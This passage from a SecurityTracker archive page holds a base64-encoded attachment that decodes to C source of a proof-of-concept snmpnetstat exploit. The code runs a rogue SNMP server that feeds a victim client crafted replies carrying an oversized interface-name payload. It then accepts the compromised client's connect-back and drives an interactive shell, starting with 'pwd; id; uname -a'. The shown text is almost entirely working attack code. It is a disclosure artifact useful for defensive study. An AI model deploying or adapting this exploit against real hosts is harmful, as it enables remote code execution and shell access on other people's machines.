ewoJCWNhc2UgMTogLyogaWZpbmRleCAqLwoJCQlsZW4gKz0gNDsKCQkJcHRy
ID0gYXNuX2FwcGVuZF9zZXF1ZW5jZSAocHRyLCBsZW4pOwoJCQlwdHIgPSBh
c25fYXBwZW5kX29iamVjdGlkIChwdHIsIG9pZHNbaV0sIDEwKTsKCQkJcHRy
ID0gYXNuX2FwcGVuZF9pbnRlZ2VyIChwdHIsIDIsIDEpOwoJCQlicmVhazsK
CgkJY2FzZSAyOiAvKiBpZm5hbWUgKi8KCQkJbGVuICs9IDMgKyBldmlsX3N0
cl9sZW47CgkJCXB0ciA9IGFzbl9hcHBlbmRfc2VxdWVuY2UgKHB0ciwgbGVu
KTsKCQkJcHRyID0gYXNuX2FwcGVuZF9vYmplY3RpZCAocHRyLCBvaWRzW2ld
LCAxMCk7CgkJCXB0ciA9IGFzbl9hcHBlbmRfb2N0ZXRfc3RyaW5nIChwdHIs
IGV2aWxfc3RyLCBldmlsX3N0cl9sZW4pOwoJCQlicmVhazsKCgkJY2FzZSA0
OiAvKiBpZm10dSAqLwoJCWNhc2UgODogLyogaWZvcGVyc3RhdHVzICovCgkJ
CWxlbiArPSA0OwoJCQlwdHIgPSBhc25fYXBwZW5kX3NlcXVlbmNlIChwdHIs
IGxlbik7CgkJCXB0ciA9IGFzbl9hcHBlbmRfb2JqZWN0aWQgKHB0ciwgb2lk
c1tpXSwgMTApOwoJCQlwdHIgPSBhc25fYXBwZW5kX2ludGVnZXIgKHB0ciwg
MiwgMik7CgkJCWJyZWFrOwoKCQljYXNlIDB4YjogICAvKiBJTlVDQVNUUEtU
UyAqLwoJCWNhc2UgMHhjOiAgIC8qIElOTlVDQVNUUEtUUyAqLwoJCWNhc2Ug
MHhlOiAgIC8qIElORVJST1JTICovCgkJY2FzZSAweDExOiAgLyogT1VUVUNB
U1RQS1RTICovCgkJY2FzZSAweDEyOiAgLyogT1VUTlVDQVNUUEtUUyAqLwoJ
CWNhc2UgMHgxNDogIC8qIE9VVEVSUk9SUyAqLwoJCQlsZW4gKz0gNDsKCQkJ
cHRyID0gYXNuX2FwcGVuZF9zZXF1ZW5jZSAocHRyLCBsZW4pOwoJCQlwdHIg
PSBhc25fYXBwZW5kX29iamVjdGlkIChwdHIsIG9pZHNbaV0sIDEwKTsKCQkJ
KnB0cisrID0gMHg0MTsKCQkJKnB0cisrID0gMjsKCQkJKnB0cisrID0gMTsK
CQkJKnB0cisrID0gMTsKCQkJYnJlYWs7CgkJCQoJCWNhc2UgMHgxNTogIC8q
IE9VVFFMRU4gKi8KCQkJbGVuICs9IDM7CgkJCXB0ciA9IGFzbl9hcHBlbmRf
c2VxdWVuY2UgKHB0ciwgbGVuKTsKCQkJcHRyID0gYXNuX2FwcGVuZF9vYmpl
Y3RpZCAocHRyLCBvaWRzW2ldLCAxMCk7CgkJCSpwdHIrKyA9IDB4NDI7CgkJ
CSpwdHIrKyA9IDE7CgkJCSpwdHIrKyA9IDA7CgkJCWJyZWFrOwoJCX0KCX0K
CiAgICAgICAgbGVuID0gKHB0ciAtIHJlc3ApOwoJCiAgICAgICAgaWYgKHNl
bmR0byAoc2QsIHJlc3AsIGxlbiwgMCwgKHN0cnVjdCBzb2NrYWRkciAqKSAm
Y2xpZW50LCBzaXplb2YgKGNsaWVudCkpICE9IGxlbikKICAgICAgICAgICAg
ICAgIHBlcnJvciAoInNlbmR0bygpIiksIGV4aXQgKEVYSVRfRkFJTFVSRSk7
CgogICAgICAgIHN0YXRlID0gU1RBVEVfV0FJVElOR19DT05ORUNUOwp9Cgpz
dGF0aWMgdm9pZApzbm1wX3dhaXRpbmdfZ2V0bmV4dDEgKGludCBzZCwgdV9j
aGFyICpidWYpCnsKCXVfY2hhciAqcHRyID0gYnVmOwoJdV9jaGFyIGxlbjsK
CWludCB2ZXJzaW9uLCBmb287Cgl1X2NoYXIgY29tbVtCVUZTSVpdLCBvaWQx
W0JVRlNJWl0sIG9pZDJbQlVGU0laXSwgb2lkM1tCVUZTSVpdOwoJdV9jaGFy
IHJlc3BbQlVGU0laXTsKCglpZiAoKnB0cisrICE9IChBU05fU0VRVUVOQ0Ug
fCBBU05fQ09OU1RSVUNUT1IpKQoJCWZhdGFsICgiZXJyb3I6IHByb3RvY29s
IGVycm9yXG4iKTsKCglsZW4gPSAqcHRyKys7CgoJcHRyID0gYXNuX2dldF9p
bnRlZ2VyIChwdHIsICZ2ZXJzaW9uKTsKCWlmICh2ZXJzaW9uICE9IDApCgkJ
ZmF0YWwgKCJlcnJvcjogY2xpZW50IHVzZXMgYSB2ZXJzaW9uIGRpZmZlcmVu
dCBmcm9tIDBcbiIpOwoKCW1lbXNldCAoY29tbSwgMCwgc2l6ZW9mIChjb21t
KSk7CglwdHIgPSBhc25fZ2V0X29jdGV0X3N0cmluZyAocHRyLCBjb21tKTsK
CQkKCWlmICgqcHRyKysgIT0gU05NUF9HRVRORVhUUkVRVUVTVCkKCQlmYXRh
bCAoImVycm9yOiBwcm90b2NvbCBlcnJvclxuIik7CgoJcHRyKys7IC8qIHNr
aXAgbGVuICovCgkKCXB0ciA9IGFzbl9nZXRfaW50ZWdlciAocHRyLCAmc2Vz
c2lvbl9pZCk7CgoJcHRyID0gYXNuX2dldF9pbnRlZ2VyIChwdHIsICZmb28p
OwoJcHRyID0gYXNuX2dldF9pbnRlZ2VyIChwdHIsICZmb28pOwoKCWlmICgq
cHRyKysgIT0gKEFTTl9TRVFVRU5DRSB8IEFTTl9DT05TVFJVQ1RPUikpCgkJ
ZmF0YWwgKCJlcnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwoJcHRyKys7CgoJ
aWYgKCpwdHIrKyAhPSAoQVNOX1NFUVVFTkNFIHwgQVNOX0NPTlNUUlVDVE9S
KSkKCQlmYXRhbCAoImVycm9yOiBwcm90b2NvbCBlcnJvclxuIik7CglwdHIr
KzsKCXB0ciA9IGFzbl9nZXRfb2JqZWN0aWQgKHB0ciwgb2lkMSk7CglpZiAo
bWVtY21wIChvaWQxLCAiXHgyQlx4MDZceDAxXHgwMlx4MDFceDA0XHgxNFx4
MDFceDAyXHgwMFx4MDBceDAwXHgwMCIsIDB4MEQpICE9IDApCgkJZmF0YWwg
KCJlcnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwoJcHRyICs9IDI7CgoJaWYg
KCpwdHIrKyAhPSAoQVNOX1NFUVVFTkNFIHwgQVNOX0NPTlNUUlVDVE9SKSkK
CQlmYXRhbCAoImVycm9yOiBwcm90b2NvbCBlcnJvclxuIik7CglwdHIrKzsK
CXB0ciA9IGFzbl9nZXRfb2JqZWN0aWQgKHB0ciwgb2lkMik7CglpZiAobWVt
Y21wIChvaWQyLCAiXHgyQlx4MDZceDAxXHgwMlx4MDFceDA0XHgxNFx4MDFc
eDAxXHgwMFx4MDBceDAwXHgwMCIsIDB4MEQpICE9IDApCgkJZmF0YWwgKCJl
cnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwoJcHRyICs9IDI7CgoJaWYgKCpw
dHIrKyAhPSAoQVNOX1NFUVVFTkNFIHwgQVNOX0NPTlNUUlVDVE9SKSkKCQlm
YXRhbCAoImVycm9yOiBwcm90b2NvbCBlcnJvclxuIik7CglwdHIrKzsKCXB0
ciA9IGFzbl9nZXRfb2JqZWN0aWQgKHB0ciwgb2lkMyk7CglpZiAobWVtY21w
IChvaWQzLCAiXHgyQlx4MDZceDAxXHgwMlx4MDFceDA0XHgxNFx4MDFceDAz
XHgwMFx4MDBceDAwXHgwMCIsIDB4MEQpICE9IDApCgkJZmF0YWwgKCJlcnJv
cjogcHJvdG9jb2wgZXJyb3JcbiIpOwoKCW1lbXNldCAocmVzcCwgMCwgc2l6
ZW9mIChyZXNwKSk7CglwdHIgPSByZXNwOwoKCXB0ciA9IGFzbl9hcHBlbmRf
c2VxdWVuY2UgKHB0ciwgMHg1NCArIDkpOwoJcHRyID0gYXNuX2FwcGVuZF9p
bnRlZ2VyIChwdHIsIDAsIDEpOwoJcHRyID0gYXNuX2FwcGVuZF9vY3RldF9z
dHJpbmcgKHB0ciwgY29tbSwgc3RybGVuIChjb21tKSk7CgkqcHRyKysgPSBT
Tk1QX0dFVFJFU1BPTlNFOwoJKnB0cisrID0gMHg0NyArIDk7CglwdHIgPSBh
c25fYXBwZW5kX2ludGVnZXIgKHB0ciwgc2Vzc2lvbl9pZCwgNCk7CglwdHIg
PSBhc25fYXBwZW5kX2ludGVnZXIgKHB0ciwgMCwgMSk7CglwdHIgPSBhc25f
YXBwZW5kX2ludGVnZXIgKHB0ciwgMCwgMSk7CgkKCXB0ciA9IGFzbl9hcHBl
bmRfc2VxdWVuY2UgKHB0ciwgMHgzOSArIDkpOwoJCglwdHIgPSBhc25fYXBw
ZW5kX3NlcXVlbmNlIChwdHIsIDB4MTEgKyAxKTsKCXB0ciA9IGFzbl9hcHBl
bmRfb2JqZWN0aWQgKHB0ciwgb2lkMSwgMHgwRCk7CglwdHIgPSBhc25fYXBw
ZW5kX2ludGVnZXIgKHB0ciwgMSwgMSk7CgkKCXB0ciA9IGFzbl9hcHBlbmRf
c2VxdWVuY2UgKHB0ciwgMHgxMSArIDQpOwoJcHRyID0gYXNuX2FwcGVuZF9v
YmplY3RpZCAocHRyLCBvaWQyLCAweDBEKTsKCXB0ciA9IGFzbl9hcHBlbmRf
aW50ZWdlciAocHRyLCAweGFhYmJjY2RkLCA0KTsKCQoJcHRyID0gYXNuX2Fw
cGVuZF9zZXF1ZW5jZSAocHRyLCAweDExICsgNCk7CglwdHIgPSBhc25fYXBw
ZW5kX29iamVjdGlkIChwdHIsIG9pZDMsIDB4MEQpOwoJcHRyID0gYXNuX2Fw
cGVuZF9pbnRlZ2VyIChwdHIsIDB4YWFiYmNjZGQsIDQpOwoJCglsZW4gPSAo
cHRyIC0gcmVzcCk7CgoJaWYgKHNlbmR0byAoc2QsIHJlc3AsIGxlbiwgMCwg
KHN0cnVjdCBzb2NrYWRkciAqKSAmY2xpZW50LCBzaXplb2YgKGNsaWVudCkp
ICE9IGxlbikKCQlwZXJyb3IgKCJzZW5kdG8oKSIpLCBleGl0IChFWElUX0ZB
SUxVUkUpOwoKCXN0YXRlID0gU1RBVEVfV0FJVElOR19HRVRORVhUMjsKfQoK
c3RhdGljIHZvaWQKc25tcF9saXN0ZW5pbmcgKGludCBzZCwgdV9jaGFyICpi
dWYpCnsKCXVfY2hhciAqcHRyID0gYnVmOwoJdV9jaGFyIGxlbjsKCWludCB2
ZXJzaW9uLCBmb287Cgl1X2NoYXIgY29tbVtCVUZTSVpdLCBvaWRbQlVGU0la
XTsKCXVfY2hhciByZXNwW0JVRlNJWl07CgkKCWlmICgqcHRyKysgIT0gKEFT
Tl9TRVFVRU5DRSB8IEFTTl9DT05TVFJVQ1RPUikpCgkJZmF0YWwgKCJlcnJv
cjogcHJvdG9jb2wgZXJyb3JcbiIpOwoKCWxlbiA9ICpwdHIrKzsKCglwdHIg
PSBhc25fZ2V0X2ludGVnZXIgKHB0ciwgJnZlcnNpb24pOyAKCWlmICh2ZXJz
aW9uICE9IDApCgkJZmF0YWwgKCJlcnJvcjogY2xpZW50IHVzZXMgYSB2ZXJz
aW9uIGRpZmZlcmVudCBmcm9tIDBcbiIpOwoKCW1lbXNldCAoY29tbSwgMCwg
c2l6ZW9mIChjb21tKSk7CglwdHIgPSBhc25fZ2V0X29jdGV0X3N0cmluZyAo
cHRyLCBjb21tKTsKCQkKCWlmICgqcHRyKysgIT0gU05NUF9HRVRSRVFVRVNU
KQoJCWZhdGFsICgiZXJyb3I6IHByb3RvY29sIGVycm9yXG4iKTsKCglwdHIr
KzsgLyogc2tpcCBsZW4gKi8KCglwdHIgPSBhc25fZ2V0X2ludGVnZXIgKHB0
ciwgJnNlc3Npb25faWQpOwoJcHRyID0gYXNuX2dldF9pbnRlZ2VyIChwdHIs
ICZmb28pOwoJcHRyID0gYXNuX2dldF9pbnRlZ2VyIChwdHIsICZmb28pOwoK
CWlmICgqcHRyKysgIT0gKEFTTl9TRVFVRU5DRSB8IEFTTl9DT05TVFJVQ1RP
UikpCgkJZmF0YWwgKCJlcnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwoJcHRy
Kys7CglpZiAoKnB0cisrICE9IChBU05fU0VRVUVOQ0UgfCBBU05fQ09OU1RS
VUNUT1IpKQoJCWZhdGFsICgiZXJyb3I6IHByb3RvY29sIGVycm9yXG4iKTsK
CXB0cisrOwoKCXB0ciA9IGFzbl9nZXRfb2JqZWN0aWQgKHB0ciwgb2lkKTsK
CWlmIChtZW1jbXAgKG9pZCwgIlx4MkJceDA2XHgwMVx4MDJceDAxXHgwMlx4
MDFceDAwIiwgOCkgIT0gMCkKCQlmYXRhbCAoImVycm9yOiBwcm90b2NvbCBl
cnJvclxuIik7CgkKCW1lbXNldCAocmVzcCwgMCwgc2l6ZW9mIChyZXNwKSk7
CglwdHIgPSByZXNwOwoKCXB0ciA9IGFzbl9hcHBlbmRfc2VxdWVuY2UgKHB0
ciwgNDIpOwoJcHRyID0gYXNuX2FwcGVuZF9pbnRlZ2VyIChwdHIsIDAsIDEp
OwoJcHRyID0gYXNuX2FwcGVuZF9vY3RldF9zdHJpbmcgKHB0ciwgY29tbSwg
c3RybGVuIChjb21tKSk7CgkqcHRyKysgPSBTTk1QX0dFVFJFU1BPTlNFOwoJ
KnB0cisrID0gMHgxRDsKCXB0ciA9IGFzbl9hcHBlbmRfaW50ZWdlciAocHRy
LCBzZXNzaW9uX2lkLCA0KTsKCXB0ciA9IGFzbl9hcHBlbmRfaW50ZWdlciAo
cHRyLCAwLCAxKTsKCXB0ciA9IGFzbl9hcHBlbmRfaW50ZWdlciAocHRyLCAw
LCAxKTsKCXB0ciA9IGFzbl9hcHBlbmRfc2VxdWVuY2UgKHB0ciwgMHgwRik7
CglwdHIgPSBhc25fYXBwZW5kX3NlcXVlbmNlIChwdHIsIDB4MEQpOwoJcHRy
ID0gYXNuX2FwcGVuZF9vYmplY3RpZCAocHRyLCBvaWQsIDgpOwoJcHRyID0g
YXNuX2FwcGVuZF9pbnRlZ2VyIChwdHIsIDEsIDEpOwoJCglsZW4gPSAocHRy
IC0gcmVzcCk7CgoJaWYgKHNlbmR0byAoc2QsIHJlc3AsIGxlbiwgMCwgKHN0
cnVjdCBzb2NrYWRkciAqKSAmY2xpZW50LCBzaXplb2YgKGNsaWVudCkpICE9
IGxlbikKCQlwZXJyb3IgKCJzZW5kdG8oKSIpLCBleGl0IChFWElUX0ZBSUxV
UkUpOwoKCXN0YXRlID0gU1RBVEVfV0FJVElOR19HRVRORVhUMTsKfQoKc3Rh
dGljIHZvaWQKYmluZHNoZWxsIChpbnQgc2QpCnsKCXN0cnVjdCBwb2xsZmQg
ZmRzWzJdOwoJdV9jaGFyICpjbWRzID0gInB3ZDsgaWQ7IHVuYW1lIC1hXG4i
OwoJdV9jaGFyIGJ1ZltCVUZTSVpdOwoJaW50IG47CgkKCXdyaXRlIChzZCwg
Y21kcywgc3RybGVuIChjbWRzKSk7CgoJd2hpbGUgKDEpCgl7CgkJbWVtc2V0
ICgmZmRzLCAwLCBzaXplb2YgKGZkcykpOwoKCQlmZHNbMF0uZXZlbnRzID0g
ZmRzWzFdLmV2ZW50cyA9IFBPTExJTjsKCQlmZHNbMF0uZmQgPSBzZDsKCQlm
ZHNbMV0uZmQgPSAwOwoKCQlpZiAocG9sbCAoZmRzLCAyLCAtMSkgPCAwKQoJ
CQlmYXRhbCAoInBvbGwoKTogJXNcbiIsIHN0cmVycm9yIChlcnJubykpOwoK
CQlpZiAoZmRzWzBdLnJldmVudHMgJiAoUE9MTEVSUiB8IFBPTExOVkFMIHwg
UE9MTEhVUCkpCgkJCWZhdGFsICgiY29ubmVjdGlvbiBjbG9zZWRcbiIpOwoK
CQlpZiAoZmRzWzBdLnJldmVudHMgJiBQT0xMSU4pCgkJewoJCQluID0gcmVh
ZCAoZmRzWzBdLmZkLCBidWYsIEJVRlNJWik7CgkJCWlmIChuIDwgMSkKCQkJ
CWZhdGFsICgiY29ubmVjdGlvbiBjbG9zZWRcbiIpOwoJCQl3cml0ZSAoMSwg
YnVmLCBuKTsKCQl9CgkJCgkJaWYgKGZkc1sxXS5yZXZlbnRzICYgUE9MTElO
KQoJCXsKCQkJbiA9IHJlYWQgKGZkc1sxXS5mZCwgYnVmLCBCVUZTSVopOwoJ
CQl3cml0ZSAoc2QsIGJ1Ziwgbik7CgkJfQoJfQp9CgpzdGF0aWMgdm9pZApz
bm1wX3dhaXRpbmdfY29ubmVjdCAodm9pZCkKewoJaW50IHNkLCB2YWwsIGZz
ZCwgc2xlbjsKCXN0cnVjdCBzb2NrYWRkcl9pbiBzX2luOwoJc3RydWN0IHBv
bGxmZCBwZmQ7CgkKCWlmICgoc2QgPSBzb2NrZXQgKEFGX0lORVQsIFNPQ0tf
U1RSRUFNLCBJUFBST1RPX1RDUCkpIDwgMCkKCQlmYXRhbCAoInNvY2tldCgp
OiAlc1xuIiwgc3RyZXJyb3IgKGVycm5vKSk7CgoJbWVtc2V0ICgmc19pbiwg
MCwgc2l6ZW9mIChzX2luKSk7CglzX2luLnNpbl9mYW1pbHkgPSBBRl9JTkVU
OwoJc19pbi5zaW5fYWRkci5zX2FkZHIgPSAodXNlX2JpbmRfYWRkciA/IGJp
bmRfYWRkciA6IElOQUREUl9BTlkpOwoJc19pbi5zaW5fcG9ydCA9IGh0b25z
IChiaW5kcG9ydCk7CgoJaWYgKGJpbmQgKHNkLCAoc3RydWN0IHNvY2thZGRy
ICopICZzX2luLCBzaXplb2YgKHNfaW4pKSA8IDApCgkJZmF0YWwgKCJiaW5k
KCk6ICVzXG4iLCBzdHJlcnJvciAoZXJybm8pKTsKCglsaXN0ZW4gKHNkLCA1
KTsKCglmcHJpbnRmIChzdGRlcnIsICJhd2FpdGluZyBjb25uZWN0aW9uIGZy
b20gY2xpZW50Li4uXG4iKTsKCgltZW1zZXQgKCZwZmQsIDAsIHNpemVvZiAo
cGZkKSk7CglwZmQuZmQgPSBzZDsKCXBmZC5ldmVudHMgPSBQT0xMSU47CgoJ
aWYgKCh2YWwgPSBwb2xsICgmcGZkLCAxLCAyMCAqIDEwMDApKSA8IDApCgkJ
ZmF0YWwgKCJwb2xsKCk6ICVzXG4iLCBzdHJlcnJvciAoZXJybm8pKTsKCglp
ZiAodmFsIDwgMSB8fCBwZmQucmV2ZW50cyAmIChQT0xMRVJSIHwgUE9MTE5W
QUwgfCBQT0xMSFVQKSB8fCAhKHBmZC5yZXZlbnRzICYgUE9MTElOKSkKCQlm
YXRhbCAoIm5vIGNvbm5lY3Rpb24gZnJvbSBjbGllbnQgaW4gMjAgc2Vjb25k
cy4gYWJvcnRpbmdcbiIpOwoKCW1lbXNldCAoJnNfaW4sIDAsIHNpemVvZiAo
c19pbikpOwoJc2xlbiA9IHNpemVvZiAoc19pbik7Cglmc2QgPSBhY2NlcHQg
KHNkLCAmc19pbiwgJnNsZW4pOwoJY2xvc2UgKHNkKTsKCglpZiAoZnNkIDwg
MCkKCQlmYXRhbCAoImFjY2VwdCgpOiAlc1xuIiwgc3RyZXJyb3IgKGVycm5v
KSk7CgoJZnByaW50ZiAoc3RkZXJyLCAicmVjZWl2ZWQgY29ubmVjdGlvbiBm
cm9tICVzOiVpXG4iLAoJCQlpbmV0X250b2EgKHNfaW4uc2luX2FkZHIpLAoJ
CQlodG9ucyAoc19pbi5zaW5fcG9ydCkpOwoKCWJpbmRzaGVsbCAoZnNkKTsK
fQoKc3RhdGljIHZvaWQKc25tcF9wcm9jY2VzcyAoaW50IHNkLCB1X2NoYXIg
KmJ1ZikKewoJc3dpdGNoIChzdGF0ZSkKCXsKCWNhc2UgU1RBVEVfTElTVEVO
SU5HOgoJCXNubXBfbGlzdGVuaW5nIChzZCwgYnVmKTsKCQlicmVhazsKCglj
YXNlIFNUQVRFX1dBSVRJTkdfR0VUTkVYVDE6CgkJc25tcF93YWl0aW5nX2dl
dG5leHQxIChzZCwgYnVmKTsKCQlicmVhazsKCgljYXNlIFNUQVRFX1dBSVRJ
TkdfR0VUTkVYVDI6CgkJc25tcF93YWl0aW5nX2dldG5leHQyIChzZCwgYnVm
KTsKCQlicmVhazsKCX0KfQoKc3RhdGljIHZvaWQgX19hdHRyaWJ1dGVfXyAo
KG5vcmV0dXJuKSkKdXNhZ2UgKHVfY2hhciAqcCkKewoJZnByaW50ZiAoc3Rk
ZXJyLCAiVXNhZ2U6ICVzIFtvcHRpb25zXVxuIiwgcCk7CglmcHJpbnRmIChz
dGRlcnIsICJvcHRpb25zOlxuIgoJCQkiLXAgPHBvcnQ+XHRzbm1wIHBvcnQg
dG8gbGlzdGVuIG9uXG4iCgkJCSItUCA8cG9ydD5cdGNvbm5lY3QtYmFjayBw
b3J0XG4iCgkJCSItYSA8aXA+XHRcdGJpbmQgc29ja2V0IHRvIHRoaXMgYWRk
cmVzc1xuIgoJCQkiLWhcdFx0c2hvdyB0aGlzXG5cbiIpOwoJZXhpdCAoRVhJ
VF9GQUlMVVJFKTsKfQoKaW50Cm1haW4gKGludCBhcmdjLCBjaGFyICphcmd2
W10pCnsKCWludCBzZCwgc2xlbjsKCXN0cnVjdCBzb2NrYWRkcl9pbiBzX2lu
OwoJdV9jaGFyIGJ1ZltCVUZTSVpdOwoJdW5zaWduZWQgc2hvcnQgc25tcF9w
b3J0ID0gMTYxOwoJdW5zaWduZWQgbG9uZyBzbm1wX2lwID0gSU5BRERSX0FO
WTsKCWNoYXIgb3B0OwoJCglmcHJpbnRmIChzdGRlcnIsICJcbnByb29mIG9m
IGNvbmNlcHQgc25tcG5ldHN0YXQgeHBsb2l0IC0gSnVhbiBNLiBkZSBsYSBU
b3JyZSA8am10b3JyZUBheGlvbWFzaXN0ZW1hcy5jb20+XG5cbiIpOwoKCXdo
aWxlICgob3B0ID0gZ2V0b3B0IChhcmdjLCBhcmd2LCAicDpQOmE6aCIpKSAh
PSBFT0YpCgkJc3dpdGNoIChvcHQpCgkJewoJCWNhc2UgJ3AnOgoJCQlzbm1w
X3BvcnQgPSBhdG9pIChvcHRhcmcpOwoJCQlicmVhazsKCgkJY2FzZSAnUCc6
CgkJCWJpbmRwb3J0ID0gYXRvaSAob3B0YXJnKTsKCQkJYnJlYWs7CgkJCgkJ
Y2FzZSAnYSc6CgkJCWlmIChpbmV0X2F0b24gKG9wdGFyZywgKHN0cnVjdCBp
bl9hZGRyICopICZzbm1wX2lwKSA9PSAwKQoJCQkJZmF0YWwgKCIlcyBpcyBu
b3QgYSB2YWxpZCBpcCBhZGRyZXNzXG4iLCBvcHRhcmcpOwoJCQliaW5kX2Fk
ZHIgPSBzbm1wX2lwOwoJCQl1c2VfYmluZF9hZGRyID0gMTsKCQkJYnJlYWs7
CgkJCgkJY2FzZSAnaCc6IC8qIGZhbGx0aHJvdWdoICovCgkJZGVmYXVsdDoK
CQkJdXNhZ2UgKGFyZ3ZbMF0pOwoJCX0KCglmcHJpbnRmIChzdGRlcnIsICJ1
c2UgLWggdG8gc2hvdyB1c2FnZVxuIik7CgoJaWYgKChzZCA9IHNvY2tldCAo
QUZfSU5FVCwgU09DS19ER1JBTSwgSVBQUk9UT19VRFApKSA8IDApCgkJcGVy
cm9yICgic29ja2V0KCkiKSwgZXhpdCAoRVhJVF9GQUlMVVJFKTsKCgltZW1z
ZXQgKCZzX2luLCAwLCBzaXplb2YgKHNfaW4pKTsKCXNfaW4uc2luX2ZhbWls
eSA9IEFGX0lORVQ7CglzX2luLnNpbl9wb3J0ID0gaHRvbnMgKHNubXBfcG9y
dCk7CglzX2luLnNpbl9hZGRyLnNfYWRkciA9IHNubXBfaXA7CgoJaWYgKGJp
bmQgKHNkLCAoc3RydWN0IHNvY2thZGRyICopICZzX2luLCBzaXplb2YgKHNf
aW4pKSA8IDApCgkJcGVycm9yICgiYmluZCgpIiksIGV4aXQgKEVYSVRfRkFJ
TFVSRSk7CgoJc3RhdGUgPSBTVEFURV9MSVNURU5JTkc7CgoJZnByaW50ZiAo
c3RkZXJyLCAiYm91bmQgc29ja2V0IHRvICVzOiVpXG4iLCBpbmV0X250b2Eg
KHNfaW4uc2luX2FkZHIpLCBzbm1wX3BvcnQpOwoKCXdoaWxlICgxKQoJewoJ
CW1lbXNldCAoYnVmLCAwLCBzaXplb2YgKGJ1ZikpOwoJCXNsZW4gPSBzaXpl
b2YgKGNsaWVudCk7CgkJaWYgKHJlY3Zmcm9tIChzZCwgYnVmLCBzaXplb2Yg
KGJ1ZiksIDAsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJmNsaWVudCwgJnNsZW4p
IDwgMSkKCQkJcGVycm9yICgicmVjdmZyb20oKSIpLCBleGl0IChFWElUX0ZB
SUxVUkUpOwoKCQlmcHJpbnRmIChzdGRlcnIsICJwcm9jZXNpbmcgc25tcCBw
YWNrZXQgZnJvbSAlczolaVxuIiwKCQkJCWluZXRfbnRvYSAoY2xpZW50LnNp
bl9hZGRyKSwKCQkJCWh0b25zIChjbGllbnQuc2luX3BvcnQpKTsKCgkJc25t
cF9wcm9jY2VzcyAoc2QsIGJ1Zik7CgoJCWlmIChzdGF0ZSA9PSBTVEFURV9R
VUlUVElORykKCQkJYnJlYWs7CgoJCWlmIChzdGF0ZSA9PSBTVEFURV9XQUlU
SU5HX0NPTk5FQ1QpCgkJewoJCQlzbm1wX3dhaXRpbmdfY29ubmVjdCAoKTsK
CQkJYnJlYWs7CgkJfQoJfQoKCWNsb3NlIChzZCk7CgkKCWV4aXQgKEVYSVRf
U1VDQ0VTUyk7Cn0KCgo=

--=====_10100706846334=_--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC